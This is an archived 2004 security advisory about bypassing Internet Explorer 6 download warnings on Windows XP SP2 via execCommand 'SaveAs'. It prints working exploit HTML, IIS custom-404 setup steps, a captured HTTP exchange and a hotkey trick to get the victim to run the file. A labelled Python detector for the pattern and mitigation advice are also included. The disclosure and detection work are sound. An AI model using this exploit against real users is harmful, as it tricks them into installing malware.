Subject: [NT] Circumvent Windows XP SP2 Security Features using execCommand 'SaveAs' Function
Date: 22 Nov 2004 16:39:16 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com


Circumvent Windows XP SP2 Security Features using execCommand 'SaveAs' Function
------------------------------------------------------------------------


SUMMARY

Microsoft Internet Explorer (including IE for Windows XP SP2) is reported 
to be vulnerable to a file downloading security warning bypass. This 
unpatched flaw may be exploited to download a malicious executable file 
masqueraded as an HTML file.

DETAILS

Vulnerable Systems:
 * Internet Explorer version 6

When your browser cannot locate the URL that you entered in the address 
bar, you receive a 404 error message telling you that the file was not 
found. The exploit described below uses a custom HTTP 404 error message 
(v.exe) which is fed to the execCommand method, which in turn executes the 
file (without warning). The only user input required is for the user to 
accept a prompt asking him to "Save an HTML Document".

1. Bypasses the "File Download - Security Warning".
Each time you click a download link, Windows XP pops up a "File Download - 
Security Warning", making you aware that Windows is downloading a program. 
In addition Windows XP will ask for your permission to complete the 
download process.

2. Bypasses the "Open File - Security Warning".
Launching a downloaded executable that originates from an untrusted 
location (zone) such as the Internet brings up an "Open File - Security 
Warning" that asks for permission to run the file.

The execCommand Method:
The execCommand method executes a command on the current document. One of 
the many commands this method accepts is SaveAs, which saves the current 
Web page to a local file. The SaveAs command has the following format: 
document.execCommand('SaveAs', '1', 'Name of the webpage.htm');

How does it work? (Exploit):
Notice that no warning message such as "File Download - Security Warning" 
or "Open File - Security Warning" is shown.
In addition, if "Hide file extensions for known file types" (Tools->Folder 
Options...->View) is enabled (i.e., 'funny joke.exe' appears as 'funny 
joke'), it's possible to trick a user into downloading a malicious 
executable file by masquerading it as an HTML document (Windows XP SP2 
would normally prevent direct downloading, but in this case it doesn't).

The following code requires no special server setup, and should work from 
any web page that IE 6.0 downloads:
<html>
 <body>
 <iframe src='http://domain.com/v.exe?.htm' name="NotFound" width="0" height="0"></iframe>Click
 <a href=# onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');">
 here</a>.
 </body>
</html>

In addition, here's an example that requires modifying the IIS Error 
Mapping Properties (see below):
Steps to configure IIS:
Launch Internet Information Services manager. Under the 'Custom Errors' 
tab, modify the Error Mapping Properties as follows:
 * Error Code: 404
 * Default Text: Not Found
 * Message Type: URL
 * URL: /v.exe (name of the executable)

Within the HTML page, insert an IFRAME as follows:
<iframe src='vengy404.htm' name="NotFound" width="0" height="0"></iframe>

The file 'vengy404.htm' intentionally doesn't exist on the server, so it 
will trigger a 404 error message as defined above. But, the JavaScript 
code below references the stealthy v.exe data within the frame 'NotFound' 
and is linked to 'funny joke.exe' when prompted to save the file:

javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');

Entire code sample for the 404 error page:
<html>
 <body>
 <iframe src='vengy404.htm' name="NotFound" width="0" height="0"></iframe>Click
 <a href=# onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');">
 here</a>.
 </body>
</html>

Breakdown of the TCP stream going from Internet Explorer to IIS:
Here's what occurs internally when fetching the exploit web page plus the 
404 error message (v.exe).

 GET /// HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 16 Nov 2004 02:34:44 GMT
If-None-Match: "7e5914d584cbc41:10d2"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: insecure.hopto.org:53
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Server: Microsoft-IIS/5.1
Date: Tue, 16 Nov 2004 12:31:00 GMT
Content-Location: http://insecure.hopto.org:53/index.htm
ETag: "7e5914d584cbc41:10d2"
Content-Length: 0

GET ///vengy404.htm HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: insecure.hopto.org:53
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.1
Cache-Control: no-cache,no-transform
Expires: Tue, 16 Nov 2004 12:31:00 GMT
Content-Location: http://insecure.hopto.org:53/v.exe?404;http://insecure.hopto.org///vengy404.htm
Vary: *
Date: Tue, 16 Nov 2004 12:31:00 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Content-Length: 91408
<---V.EXE binary data goes here --->
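As an added example (not part of the advisory), a small Python checker that walks a captured request/response stream like the one above and flags the three tells a proxy or IDS reviewer would look for: an executable path carrying a document-like query suffix (the 'v.exe?.htm' trick), a document URL answered with application/octet-stream, and a Content-Location showing a custom 404 mapped to an executable. The sample stream, its host name and sizes are constructed, not taken from a real server.

```python
import re

# Constructed sample modelled on the advisory's capture; host and size are placeholders.
SAMPLE_STREAM = """\
GET ///vengy404.htm HTTP/1.1
Host: example.invalid

HTTP/1.1 200 OK
Content-Location: http://example.invalid/v.exe?404;http://example.invalid///vengy404.htm
Content-Type: application/octet-stream

GET /v.exe?.htm HTTP/1.1
Host: example.invalid

HTTP/1.1 200 OK
Content-Type: application/octet-stream
"""

EXEC_EXT = re.compile(r"\.(exe|scr|com|pif|bat|cmd)$", re.I)
DOC_EXT = re.compile(r"\.(htm|html|txt|jpg|gif|pdf)$", re.I)


def parse_messages(stream):
    """Pair each request target with the headers of the response that follows it."""
    blocks = stream.strip().split("\n\n")
    pairs = []
    for req, resp in zip(blocks[0::2], blocks[1::2]):
        target = req.splitlines()[0].split()[1]
        headers = {k.strip().lower(): v.strip()
                   for k, _, v in (line.partition(":") for line in resp.splitlines()[1:])}
        pairs.append((target, headers))
    return pairs


def flag_exchange(target, headers):
    """Return the reasons (possibly none) this request/response pair looks like the masquerade."""
    reasons = []
    path, _, query = target.partition("?")
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    if EXEC_EXT.search(path) and DOC_EXT.search(query):  # the 'v.exe?.htm' trick
        reasons.append("executable path with document-like query suffix")
    if DOC_EXT.search(path) and ctype == "application/octet-stream":
        reasons.append("document URL answered with application/octet-stream")
    loc_path, _, loc_query = headers.get("content-location", "").partition("?")
    if EXEC_EXT.search(loc_path) and loc_query.startswith("404"):
        reasons.append("custom 404 error served from an executable")
    return reasons


def scan(stream):
    """Map each suspicious request target to its list of reasons."""
    return {t: r for t, h in parse_messages(stream) if (r := flag_exchange(t, h))}
```

A plain 'v.exe' request with no query suffix is deliberately not flagged, matching the advisory's observation that IE handles that case correctly.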


Solution:
Disable Active Scripting and the "Hide file extensions for known file 
types" option
[Tools->Folder Options-> View]

Conclusion:
Overall IE attempts to intercept risky code and prompts a security warning 
message, but it seems to allow custom HTTP errors to filter through those 
security checks.

Also, by creating a 404 .lnk shortcut file with a hotkey of 'Enter', 
saving it to the desktop installs a global hotkey, so it may be possible 
to execute the downloaded file by simply forcing the user to press the 
Enter key "alert('Thanks. Press Return')".
Funny and scary how a few well placed characters <iframe src='v.exe?.htm' 
... can confuse the IE monster, whereas specifying <iframe src='v.exe' 
... is handled correctly!


ADDITIONAL INFORMATION

The information has been provided by Cyber flash A.K.A Vengy and the 
K-OTiK team <mailto:Special-Alerts@k-otik.com>.
The original article can be found at:
http://www.k-otik.com/exploits/20041119.IESP2disclosure.php
Original exploit code can be found at:
http://www.k-otik.com/exploits/20041119.IESP2Unpatched.php
